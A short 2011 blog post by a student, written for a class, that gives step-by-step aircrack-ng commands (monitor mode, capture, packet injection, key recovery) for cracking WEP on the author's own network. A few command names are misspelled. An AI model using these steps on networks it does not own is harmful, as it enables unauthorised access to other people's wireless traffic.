Nov 27, 2011

Encryption wep

Hi in the class the operating system we are seeing the security i decided show you how to crack encryption wep because i think is important know the vulnerability of the algorithms

I use my connection for this example and i need change the WPA to WEP for this example in other case i'll show you how to crack a WPA

See the Wikipedia definition Wired Equivalent Privacy (WEP)

I use backtrack 5 and in this case the suit of aircrack-ng

Now we need write on the shell airmon-ng 

Then wee see our interface in my case is wlan0


Now write in the shell 

airmong-ng wlan0 start

Now our interface is on monitor mode

Then write on the shell airodump-ng mon0 and you see the EDDID available


Then write airodump-ng -w wep -c channel  --bssid  your-bssid mon0 

Then we need inject traffic write in another shell

aireplay-ng -1 0 -a bssid mon0


In another shell write airplay-ng -3 -b bssid mon0


In another shell write  aircrack-ng wep-01.cap

In the next image see in the shell KEY FOUND



Greetings i hope you liked :D

1 comment: